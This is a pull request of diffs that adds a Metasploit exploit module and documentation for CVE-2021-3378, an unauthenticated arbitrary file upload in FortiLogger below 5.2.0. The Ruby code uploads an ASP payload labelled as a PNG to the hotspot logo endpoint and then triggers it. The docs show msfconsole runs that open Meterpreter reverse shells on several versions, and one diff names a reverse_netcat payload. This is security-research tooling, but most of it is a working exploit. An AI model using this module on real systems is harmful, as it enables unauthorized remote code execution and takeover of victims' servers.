### PR TITLE
Adding FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (CVE-2021-3378)

### DIFF
--- a/documentation/modules/exploit/windows/http/fortilogger_arbitrary_fileupload.md
+++ b/documentation/modules/exploit/windows/http/fortilogger_arbitrary_fileupload.md
@@ -5,21 +5,26 @@ running on Windows operating systems. It contains features such as instant statu
 reporting and hotspot.
 
 This module exploits an unauthenticated arbitrary file upload via insecure `POST` request on company logo upload
-for hotspot settings of FortiLogger 4.4.2.2.
+for hotspot settings of FortiLogger < 5.2.0.
 
-You can download installation file from following url:
-https://github.com/erberkan/erberkan.github.io/raw/master/2021/cve-2021-3378/Fortilogger-4.4.2.zip
+You can download installation files from https://www.fortilogger.com/download
 
-*(Vendor has removed vulnerable version from web page of vendor for download.)*
+*Vendor has removed version 4.4.2.2 from web page of vendor for download.
+You can download version 4.4.2.2 from https://github.com/erberkan/erberkan.github.io/raw/master/2021/cve-2021-3378/Fortilogger-4.4.2.zip*
+
+Tested versions:
+
+- 4.4.2.2
+- 3.6.2.9
+- 3.4.1.7
 
 ### Prerequisites
 
 1. Start a Windows VM *(Tested on Windows 10 Enterprise)*
-2. Install a vulnerable version which is 4.4.2.2 of FortiLogger via above url. *(Vendor has removed this version on
-   their web page)*
+2. Install a vulnerable version which is any version less then 5.2.0 of FortiLogger via above url.
 3. After installation, verify that the server is working by visiting it with a browser.
-    - Default port: 5000
-    - Default username:password - admin:admin
+   - Default port: 5000
+   - Default username:password - admin:admin
 
 
 ## Verification Steps
@@ -29,13 +34,13 @@ https://github.com/erberkan/erberkan.github.io/raw/master/2021/cve-2021-3378/For
 2. Do: `use exploit/windows/http/fortilogger_arbitrary_fileupload`
 3. Set `RHOSTS`
 4. Do: `run` or `exploit`
-5. **Verify** that `The target is vulnerable.` message appeared
-6. **Verify** that payload uploaded to target system successfully: `Payload has been uploaded !`
+5. **Verify** that `The target is vulnerable. FortiLogger version [version number]` message appeared
+6. **Verify** that payload uploaded to target system successfully: `Payload has been uploaded`
 7. **Verify** that you getting a meterpreter session.
 
 ## Options
 
-1.  `RHOSTS`. IP address or FQDN of target system that is FortiLogger 4.4.2.2 is running on it.
+1.  `RHOSTS`. IP address or FQDN of target system that is FortiLogger < 5.2.0 is running on it.
 2.  `RPORT`. Default port number is `5000`.
 
 
@@ -51,7 +56,7 @@ Module options (exploit/windows/http/fortilogger_arbitrary_fileupload):
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RHOSTS     192.168.1.43     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT      5000             yes       The target port (TCP)
    SSL        false            no        Negotiate SSL/TLS for outgoing connections
    TARGETURI  /                yes       The base path to the FortiLogger
@@ -71,37 +76,116 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   FortiLogger - 4.4.2.2
+   0   FortiLogger < 5.2.0
 
+```
+### Version 4.4.2.2
 
-msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > set rhosts 192.168.16.128
-rhosts => 192.168.16.128
+```
 msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run
 
 [*] Started reverse TCP handler on 192.168.1.46:4444 
 [*] Executing automatic check (disable AutoCheck to override)
-[+] The target is vulnerable.
-[+] Generate Payload !
-[+] Payload has been uploaded !
+[+] The target is vulnerable. FortiLogger version 4.4.2.2
+[+] Generate Payload
+[+] Payload has been uploaded
 [*] Executing payload...
-[*] Sending stage (175174 bytes) to 192.168.1.46
-[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.46:59563) at 2021-03-01 00:40:26 +0300
+[*] Sending stage (175174 bytes) to 192.168.1.43
+[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.43:49771) at 2021-03-02 14:05:53 +0300
 
-meterpreter > getuid
-Server username: DESKTOP-QFNKFIO\brkn
-meterpreter > sysinfo 
-Computer        : DESKTOP-QFNKFIO
-OS              : Windows 10 (10.0 Build 18363).
+meterpreter > sysinfo
+Computer        : MSEDGEWIN10
+OS              : Windows 10 (10.0 Build 17134).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
-Logged On Users : 2
+Logged On Users : 3
 Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: MSEDGEWIN10\IEUser
 meterpreter > pwd
 C:\Program Files\RZK\Fortilogger\App
 meterpreter > 
+```
 
+### Version 3.6.2.9
 
+```
+msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run
+
+[*] Started reverse TCP handler on 192.168.1.46:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. FortiLogger version 3.6.2.9
+[+] Generate Payload
+[+] Payload has been uploaded
+[*] Executing payload...
+[*] Sending stage (175174 bytes) to 192.168.1.43
+[*] Meterpreter session 2 opened (192.168.1.46:4444 -> 192.168.1.43:49764) at 2021-03-02 14:17:59 +0300
+
+meterpreter > sysinfo
+Computer        : MSEDGEWIN10
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: MSEDGEWIN10\IEUser
+meterpreter > pwd
+C:\Program Files\RZK\Fortilogger\App
+meterpreter > 
+```
+
+### Version 3.4.1.7
+
+```
+msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run
+
+[*] Started reverse TCP handler on 192.168.1.46:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. FortiLogger version 3.4.1.7
+[+] Generate Payload
+[+] Payload has been uploaded
+[*] Executing payload...
+[*] Sending stage (175174 bytes) to 192.168.1.43
+[*] Meterpreter session 3 opened (192.168.1.46:4444 -> 192.168.1.43:49791) at 2021-03-02 14:39:04 +0300
+
+meterpreter > sysinfo
+Computer        : MSEDGEWIN10
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: MSEDGEWIN10\IEUser
+meterpreter > pwd
+C:\Program Files\RZK\Fortilogger\App
+meterpreter > 
+```
+
+### If target is not accessible
+
+```
+msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run
+
+[*] Started reverse TCP handler on 192.168.1.46:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[-] Exploit aborted due to failure: unreachable: No response from server
+[*] Exploit completed, but no session was created.
+```
+
+### If target has version 5.2.0 or newest
+
+```
+msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run
+
+[*] Started reverse TCP handler on 192.168.1.46:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[-] Exploit aborted due to failure: unexpected-reply: The target may have been updated
+[*] Exploit completed, but no session was created.
 ```
 
 ## Reference

--- a/documentation/modules/exploit/windows/http/fortilogger_arbitrary_fileupload.md
+++ b/documentation/modules/exploit/windows/http/fortilogger_arbitrary_fileupload.md
@@ -23,26 +23,20 @@ Tested versions:
 1. Start a Windows VM *(Tested on Windows 10 Enterprise)*
 2. Install a vulnerable version which is any version less then 5.2.0 of FortiLogger via above url.
 3. After installation, verify that the server is working by visiting it with a browser.
-   - Default port: 5000
-   - Default username:password - admin:admin
+    - Default port: 5000
+    - Default username:password - admin:admin
 
 
 ## Verification Steps
 
 1. Install the application
-1. Start msfconsole
-2. Do: `use exploit/windows/http/fortilogger_arbitrary_fileupload`
-3. Set `RHOSTS`
-4. Do: `run` or `exploit`
-5. **Verify** that `The target is vulnerable. FortiLogger version [version number]` message appeared
-6. **Verify** that payload uploaded to target system successfully: `Payload has been uploaded`
-7. **Verify** that you getting a meterpreter session.
-
-## Options
-
-1.  `RHOSTS`. IP address or FQDN of target system that is FortiLogger < 5.2.0 is running on it.
-2.  `RPORT`. Default port number is `5000`.
-
+2. Start msfconsole
+3. Do: `use exploit/windows/http/fortilogger_arbitrary_fileupload`
+4. Set `RHOSTS`
+5. Do: `run` or `exploit`
+6. **Verify** that `The target is vulnerable. FortiLogger version [version number]` message appeared
+7. **Verify** that payload uploaded to target system successfully: `Payload has been uploaded`
+8. **Verify** that you getting a meterpreter session.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/windows/http/fortilogger_arbitrary_fileupload.md
+++ b/documentation/modules/exploit/windows/http/fortilogger_arbitrary_fileupload.md
@@ -1,0 +1,108 @@
+## Vulnerable Application
+
+FortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls,
+running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering,
+reporting and hotspot.
+
+This module exploits an unauthenticated arbitrary file upload via insecure `POST` request on company logo upload
+for hotspot settings of FortiLogger 4.4.2.2.
+
+You can download installation file from following url:
+https://github.com/erberkan/erberkan.github.io/raw/master/2021/cve-2021-3378/Fortilogger-4.4.2.zip
+
+*(Vendor has removed vulnerable version from web page of vendor for download.)*
+
+### Prerequisites
+
+1. Start a Windows VM *(Tested on Windows 10 Enterprise)*
+2. Install a vulnerable version which is 4.4.2.2 of FortiLogger via above url. *(Vendor has removed this version on
+   their web page)*
+3. After installation, verify that the server is working by visiting it with a browser.
+    - Default port: 5000
+    - Default username:password - admin:admin
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+2. Do: `use exploit/windows/http/fortilogger_arbitrary_fileupload`
+3. Set `RHOSTS`
+4. Do: `run` or `exploit`
+5. **Verify** that `The target is vulnerable.` message appeared
+6. **Verify** that payload uploaded to target system successfully: `Payload has been uploaded !`
+7. **Verify** that you getting a meterpreter session.
+
+## Options
+
+1.  `RHOSTS`. IP address or FQDN of target system that is FortiLogger 4.4.2.2 is running on it.
+2.  `RPORT`. Default port number is `5000`.
+
+
+## Scenarios
+
+```
+msf6 > use exploit/windows/http/fortilogger_arbitrary_fileupload 
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > show options 
+
+Module options (exploit/windows/http/fortilogger_arbitrary_fileupload):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      5000             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the FortiLogger
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.1.46     yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   FortiLogger - 4.4.2.2
+
+
+msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > set rhosts 192.168.16.128
+rhosts => 192.168.16.128
+msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run
+
+[*] Started reverse TCP handler on 192.168.1.46:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
+[+] Generate Payload !
+[+] Payload has been uploaded !
+[*] Executing payload...
+[*] Sending stage (175174 bytes) to 192.168.1.46
+[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.46:59563) at 2021-03-01 00:40:26 +0300
+
+meterpreter > getuid
+Server username: DESKTOP-QFNKFIO\brkn
+meterpreter > sysinfo 
+Computer        : DESKTOP-QFNKFIO
+OS              : Windows 10 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > pwd
+C:\Program Files\RZK\Fortilogger\App
+meterpreter > 
+
+
+```
+
+## Reference
+1. https://erberkan.github.io/2021/cve-2021-3378/

--- a/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
+++ b/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
@@ -1,0 +1,133 @@
+require 'csv'
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FortiLogger Arbitrary File Upload Exploit',
+        'Description' => %q{
+            This module exploits an unauthenticated arbitrary file upload
+            via insecure POST request. It has been tested on version 4.4.2.2 in
+            Windows 10 Enterprise.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Berkan Er <b3rsec@protonmail.com>'
+          ],
+        'References' =>
+          [
+            [ 'URL', 'http://erberkan.github.io']
+          ],
+
+        'Platform' => ['win'],
+        'Privileged' => false,
+        'Targets' =>
+          [
+            ['FortiLogger - 4.4.2.2', {
+              'Platform' => 'win',
+              'Arch' => ARCH_X86
+            }],
+          ],
+
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(5000),
+        OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/'])
+      ], self.class
+    )
+  end
+
+  def check_product_info()
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
+      'method' => 'POST',
+      'data' => '',
+      'headers' => {
+        'Accept' => 'application/json, text/javascript, */*; q=0.01',
+        'Accept-Language' => 'en-US,en;q=0.5',
+        'Accept-Encoding' => 'gzip, deflate',
+        'X-Requested-With' => 'XMLHttpRequest'
+      }
+    )
+
+    return res
+  end
+
+  def check
+    begin
+      res = check_product_info
+      if res && res.code == 200
+        vprint_status("Status: #{res.code}")
+        if JSON.parse(res.body)['Version'] == '4.4.2.2'
+          vprint_status((JSON.parse(res.body)['Version']).to_s)
+          Exploit::CheckCode::Vulnerable
+        else
+          Exploit::CheckCode::Safe
+        end
+      end
+    end
+  end
+
+  def create_payload
+    exe = generate_payload_exe
+    asp = Msf::Util::EXE.to_exe_asp(exe).to_s
+
+    return asp
+  end
+
+  def exploit
+    begin
+      print_good('Generate Payload !')
+      data = create_payload
+
+      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}"
+      post_data = "--#{boundary}\r\n"
+      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"b3r.asp\"\r\n"
+      post_data << "Content-Type: image/png\r\n"
+      post_data << "\r\n#{data}\r\n"
+      post_data << "--#{boundary}\r\n"
+
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
+        'ctype' => "multipart/form-data; boundary=#{boundary}",
+        'data' => post_data,
+        'headers' => {
+          'Accept' => 'application/json',
+          'Accept-Language' => 'en-US,en;q=0.5',
+          'X-Requested-With' => 'XMLHttpRequest'
+        }
+      )
+      if res && res.code == 200
+        print_good('Payload has been uploaded !')
+
+        handler
+
+        print_status("Executing payload...")
+        send_request_cgi({
+          'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
+          'method' => 'GET'
+        }, 5)
+
+      end
+    end
+  end
+end

--- a/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
+++ b/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'FortiLogger Arbitrary File Upload Exploit',
         'Description' => %q{
           This module exploits an unauthenticated arbitrary file upload
-          via insecure POST request. It has been tested on version 4.4.2.2 in
+          via insecure POST request. It has been tested on versions < 5.2.0 in
           Windows 10 Enterprise.
         },
         'License' => MSF_LICENSE,
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
       )
 
       unless res
-        fail_with(Failure::Unreachable, 'No response from server')
+        fail_with(Failure::Unknown, 'No response from server')
       end
 
       unless res.code == 200
@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'method' => 'GET'
       }, 5)
     end
-  rescue StandardError
-    fail_with(Failure::UnexpectedReply, 'Failed to execute the payload')
+  rescue StandardError => e
+    fail_with(Failure::UnexpectedReply, "Failed to execute the payload: #{e}")
   end
 end

--- a/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
+++ b/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check_product_info
-    res = send_request_cgi(
+    send_request_cgi(
       'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
       'method' => 'POST',
       'data' => '',

--- a/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
+++ b/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
@@ -75,11 +75,11 @@ class MetasploitModule < Msf::Exploit::Remote
       res = check_product_info
 
       unless res
-        fail_with(Failure::Unreachable, 'No response from server')
+        return CheckCode::Unknown('Target is unreachable.')
       end
 
       unless res.code == 200
-        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
+        return CheckCode::Unknown("Unexpected server response: #{res.code}")
       end
 
       version = Gem::Version.new(JSON.parse(res.body)['Version'])

--- a/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
+++ b/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
@@ -1,15 +1,12 @@
-require 'csv'
-
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = NormalRanking
 
   include Msf::Exploit::EXE
   prepend Msf::Exploit::Remote::AutoCheck
-  include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
 
@@ -26,23 +23,27 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' =>
           [
-            'Berkan Er <b3rsec@protonmail.com>'
+            'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module
           ],
         'References' =>
           [
-            [ 'URL', 'http://erberkan.github.io']
+            ['CVE', '2021-3378'],
+            ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/']
           ],
 
         'Platform' => ['win'],
         'Privileged' => false,
+        'Arch' => [ARCH_X86, ARCH_X64],
         'Targets' =>
           [
-            ['FortiLogger - 4.4.2.2', {
-              'Platform' => 'win',
-              'Arch' => ARCH_X86
-            }],
+            [
+              'FortiLogger - 4.4.2.2',
+              {
+                'Platform' => 'win'
+              }
+            ],
           ],
-
+        'DisclosureDate' => '2021-02-26',
         'DefaultTarget' => 0
       )
     )
@@ -55,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def check_product_info()
+  def check_product_info
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
       'method' => 'POST',
@@ -67,30 +68,25 @@ class MetasploitModule < Msf::Exploit::Remote
         'X-Requested-With' => 'XMLHttpRequest'
       }
     )
-
-    return res
   end
 
   def check
     begin
       res = check_product_info
       if res && res.code == 200
-        vprint_status("Status: #{res.code}")
         if JSON.parse(res.body)['Version'] == '4.4.2.2'
-          vprint_status((JSON.parse(res.body)['Version']).to_s)
           Exploit::CheckCode::Vulnerable
         else
           Exploit::CheckCode::Safe
         end
       end
+    rescue JSON::ParserError
+      Exploit::CheckCode::Safe
     end
   end
 
   def create_payload
-    exe = generate_payload_exe
-    asp = Msf::Util::EXE.to_exe_asp(exe).to_s
-
-    return asp
+    Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s
   end
 
   def exploit
@@ -117,16 +113,19 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
       if res && res.code == 200
-        print_good('Payload has been uploaded !')
+        if JSON.parse(res.body)['Message'] == 'Error in saving file'
+          print_error('Error for upload payload..')
+        else
+          print_good('Payload has been uploaded !')
 
-        handler
+          handler
 
-        print_status("Executing payload...")
-        send_request_cgi({
-          'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
-          'method' => 'GET'
-        }, 5)
-
+          print_status('Executing payload...')
+          send_request_cgi({
+            'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
+            'method' => 'GET'
+          }, 5)
+        end
       end
     end
   end

--- a/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
+++ b/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
@@ -11,45 +11,41 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name'           => "FortiLogger Arbitrary File Upload Exploit",
-                      'Description'    => %q{
-          This module exploits an unauthenticated arbitrary file upload via insecure POST request. It has been tested on version 4.4.2.2 in Windows 10 Enterprise.
-         },
-                        'License'        => MSF_LICENSE,
-                        'Author'         =>
-                          [
-                            'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module
-                          ],
-                        'References'     =>
-                          [
-                            ['CVE', '2021-3378'],
-                            ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/']
-                          ],
-                        'Platform'       => ['win'],
-                        'Arch'           => [ ARCH_X86, ARCH_X64 ],
-                        'Targets'        =>
-                          [
-                            ['Windows (x86)',
-                             {
-                               'Platform' => 'python',
-                               'Arch' => [ARCH_X86],
-                               'DefaultOptions' => {'PAYLOAD'  => 'windows/meterpreter/reverse_tcp'}
-                             }
-                            ],
-                            ['Command payload',
-                             {
-                               'Platform' => 'unix',
-                               'Arch' => ARCH_CMD,
-                               'Payload' => {'BadChars' => "\x26"},
-                               'DefaultOptions' => {'PAYLOAD'  => 'cmd/unix/reverse_netcat'}
-                             }
-                            ]
-                          ],
-                        'Privileged'     => false,
-                        'DisclosureDate' => '2021-02-26',
-                        'DefaultTarget'  => 0
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'FortiLogger Arbitrary File Upload Exploit',
+        'Description' => %q{
+          This module exploits an unauthenticated arbitrary file upload via insecure POST request. It has been tested on version 4.4.2.2 in
+          Windows 10 Enterprise.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module
+          ],
+        'References' =>
+          [
+            ['CVE', '2021-3378'],
+            ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/']
+          ],
+
+        'Platform' => ['win'],
+        'Privileged' => false,
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' =>
+          [
+            [
+              'FortiLogger - 4.4.2.2',
+              {
+                'Platform' => 'win'
+              }
+            ],
+          ],
+        'DisclosureDate' => '2021-02-26',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options(
       [

--- a/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
+++ b/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
@@ -11,42 +11,45 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(
-      update_info(
-        info,
-        'Name' => 'FortiLogger Arbitrary File Upload Exploit',
-        'Description' => %q{
-            This module exploits an unauthenticated arbitrary file upload
-            via insecure POST request. It has been tested on version 4.4.2.2 in
-            Windows 10 Enterprise.
-        },
-        'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module
-          ],
-        'References' =>
-          [
-            ['CVE', '2021-3378'],
-            ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/']
-          ],
-
-        'Platform' => ['win'],
-        'Privileged' => false,
-        'Arch' => [ARCH_X86, ARCH_X64],
-        'Targets' =>
-          [
-            [
-              'FortiLogger - 4.4.2.2',
-              {
-                'Platform' => 'win'
-              }
-            ],
-          ],
-        'DisclosureDate' => '2021-02-26',
-        'DefaultTarget' => 0
-      )
-    )
+    super(update_info(info,
+                      'Name'           => "FortiLogger Arbitrary File Upload Exploit",
+                      'Description'    => %q{
+          This module exploits an unauthenticated arbitrary file upload via insecure POST request. It has been tested on version 4.4.2.2 in Windows 10 Enterprise.
+         },
+                        'License'        => MSF_LICENSE,
+                        'Author'         =>
+                          [
+                            'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module
+                          ],
+                        'References'     =>
+                          [
+                            ['CVE', '2021-3378'],
+                            ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/']
+                          ],
+                        'Platform'       => ['win'],
+                        'Arch'           => [ ARCH_X86, ARCH_X64 ],
+                        'Targets'        =>
+                          [
+                            ['Windows (x86)',
+                             {
+                               'Platform' => 'python',
+                               'Arch' => [ARCH_X86],
+                               'DefaultOptions' => {'PAYLOAD'  => 'windows/meterpreter/reverse_tcp'}
+                             }
+                            ],
+                            ['Command payload',
+                             {
+                               'Platform' => 'unix',
+                               'Arch' => ARCH_CMD,
+                               'Payload' => {'BadChars' => "\x26"},
+                               'DefaultOptions' => {'PAYLOAD'  => 'cmd/unix/reverse_netcat'}
+                             }
+                            ]
+                          ],
+                        'Privileged'     => false,
+                        'DisclosureDate' => '2021-02-26',
+                        'DefaultTarget'  => 0
+          ))
 
     register_options(
       [
@@ -94,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_good('Generate Payload !')
       data = create_payload
 
-      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}"
+      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"
       post_data = "--#{boundary}\r\n"
       post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"b3r.asp\"\r\n"
       post_data << "Content-Type: image/png\r\n"

--- a/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
+++ b/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
@@ -16,7 +16,8 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'FortiLogger Arbitrary File Upload Exploit',
         'Description' => %q{
-          This module exploits an unauthenticated arbitrary file upload via insecure POST request. It has been tested on version 4.4.2.2 in
+          This module exploits an unauthenticated arbitrary file upload
+          via insecure POST request. It has been tested on version 4.4.2.2 in
           Windows 10 Enterprise.
         },
         'License' => MSF_LICENSE,
@@ -36,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets' =>
           [
             [
-              'FortiLogger - 4.4.2.2',
+              'FortiLogger < 5.2.0',
               {
                 'Platform' => 'win'
               }
@@ -51,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(5000),
         OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/'])
-      ], self.class
+      ]
     )
   end
 
@@ -72,15 +73,24 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     begin
       res = check_product_info
-      if res && res.code == 200
-        if JSON.parse(res.body)['Version'] == '4.4.2.2'
-          Exploit::CheckCode::Vulnerable
-        else
-          Exploit::CheckCode::Safe
-        end
+
+      unless res
+        fail_with(Failure::Unreachable, 'No response from server')
+      end
+
+      unless res.code == 200
+        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
+      end
+
+      version = Gem::Version.new(JSON.parse(res.body)['Version'])
+
+      if version <= Gem::Version.new('4.4.2.2')
+        CheckCode::Vulnerable("FortiLogger version #{version}")
+      else
+        CheckCode::Safe("FortiLogger version #{version}")
       end
     rescue JSON::ParserError
-      Exploit::CheckCode::Safe
+      fail_with(Failure::UnexpectedReply, 'The target may have been updated')
     end
   end
 
@@ -90,12 +100,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     begin
-      print_good('Generate Payload !')
+      print_good('Generate Payload')
       data = create_payload
 
       boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"
       post_data = "--#{boundary}\r\n"
-      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"b3r.asp\"\r\n"
+      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n"
       post_data << "Content-Type: image/png\r\n"
       post_data << "\r\n#{data}\r\n"
       post_data << "--#{boundary}\r\n"
@@ -111,21 +121,36 @@ class MetasploitModule < Msf::Exploit::Remote
           'X-Requested-With' => 'XMLHttpRequest'
         }
       )
-      if res && res.code == 200
-        if JSON.parse(res.body)['Message'] == 'Error in saving file'
-          print_error('Error for upload payload..')
-        else
-          print_good('Payload has been uploaded !')
 
-          handler
-
-          print_status('Executing payload...')
-          send_request_cgi({
-            'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
-            'method' => 'GET'
-          }, 5)
-        end
+      unless res
+        fail_with(Failure::Unreachable, 'No response from server')
       end
+
+      unless res.code == 200
+        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
+      end
+
+      json_res = begin
+        JSON.parse(res.body)
+      rescue JSON::ParserError
+        nil
+      end
+
+      if json_res.nil? || json_res['Message'] == 'Error in saving file'
+        fail_with(Failure::UnexpectedReply, 'Error uploading payload')
+      end
+
+      print_good('Payload has been uploaded')
+
+      handler
+
+      print_status('Executing payload...')
+      send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
+        'method' => 'GET'
+      }, 5)
     end
+  rescue StandardError
